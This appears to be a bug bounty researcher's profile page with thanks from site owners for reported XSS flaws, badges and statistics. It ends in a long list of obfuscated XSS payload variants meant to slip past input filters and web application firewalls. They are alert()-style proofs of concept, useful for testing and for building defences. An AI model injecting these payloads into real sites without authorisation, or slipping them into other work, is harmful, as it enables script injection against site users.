Researcher reputation:  510

Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5

About me:
http://blog.inurl.com.br/
XSS Hunter, SQL Maniac, Ex-Defacer, Website Pentester & sometime's a Skid :-D

How to contact me:
https://twitter.com/Gh05tPT
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements

    12 June, 2019

     tony_marston Tony Marston from Radicore Software Limited:

Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help.

    12 June, 2019

     CapaniAntonio Antonio Capani from Nibbles.it s.r.l.:

Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help!

    24 May, 2019

     aaccomazzi Alberto Accomazzi from Center for Astrophysics:

Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated!

    16 May, 2019

     Admeus Master from EVS:

Gh05tPT found a XSS vulnerability on our website, which was promptly resolve with his help. Really good communication and sympathy. Thanks

    10 May, 2019

     rjbica Ricardo from XWS:

Gh05tPT found a XSS issue in one of our systems and provided us the technical details to help solve the problem. Thanks!

    3 May, 2019

     pkissman Paul Kissman from Massachusetts Board of Library Commissioners:

Gh05tPT found a basic XSS vulnerability on our website. Some javascript could be entered as a parameter in a GET query and though it wouldn't be processed as form data, it could be reflected out again (unescaped) on the search results page. Thanks very much Gh05tPT.

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

    7 February, 2019

     VTCMagazine1 Andy from Mudconnect.com:

Thank you for helping mudconnect by reporting the XSS vulnerability Gh05tPT!

    7 February, 2019

     L2JDrLecter Ariel Graneros from Poder Judicial:

Gh05tPT found a security problem in one of our services. Once contacted he responded quickly and professionally. Thank you very much!

Shows the first 10 recommendations. See all.

Awards and Achievements

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Total reports:	11977
Total reports on VIP sites:	155
Total patched vulnerabilities:	4237
Total vulnerabilities on Hold (Open Bug Bounty):	2280
Recommendations received:	34
Active since:	05.04.2018
Top Security Researcher Awards:	Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month

Open Bug Bounty Certificate

04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)];     fn(atob('YWxlcnQoMSk='));</script>  
<script>var fn=window[String.fromCharCode(101,118,97,108)];     fn(atob('YWxlcnQoMSk='));</script> 
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk='));    </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>     <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script> 
<script>'str1ng'.replace(/1/,alert)</script>     <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>     <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script> 
<script>eval('\\u'+'0061'+'lert(1)')</script>     <script>throw~delete~typeof~prompt(1)</script>     <script>delete[a=alert]/prompt a(1)</script>     <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>     <script>(()=>{return this})().alert(1)</script>    
<script>new function(){new.target.constructor('alert(1)')();}</script>     <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script> 
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>     <script>Array.from`1${alert}3${window}2`</script>     
<script>!{x(){alert(1)}}.x()</script>     <script>Array.from`${eval}alert\`1\``</script>     <script>Array.from([1],alert)</script>     <script>Promise.reject("1").then(null,alert)</script>     
<svg </onload ="1> (_=alert,_(1)) "">     
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>  
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>     
<img onerror=alert(1) src <u></u>     <videogt;<source onerror=javascript:prompt(911)gt;     
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>     
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">     
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <     
<script>```${``[class extends[alert``]{}]}```</script>     <script>[class extends[alert````]{}]</script>     
<script>throw new class extends Function{}('alert(1)')``</script>     <script>x=new class extends Function{}('alert(1)'); x=new x;</script>     <script>new class extends alert(1){}</script> 
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>     
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>     <script src=data:,\u006fnerror=\u0061lert(1)></script>     
"><svg><script/xlink:href="data:,alert(1)     <svg><script/xlink:href=data:,alert(1)></script>     <frameset/onpageshow=alert(1)>     
<div onactivate=alert('Xss') id=xss style=overflow:scroll>     
<div onfocus=alert('xx') id=xss style=display:table>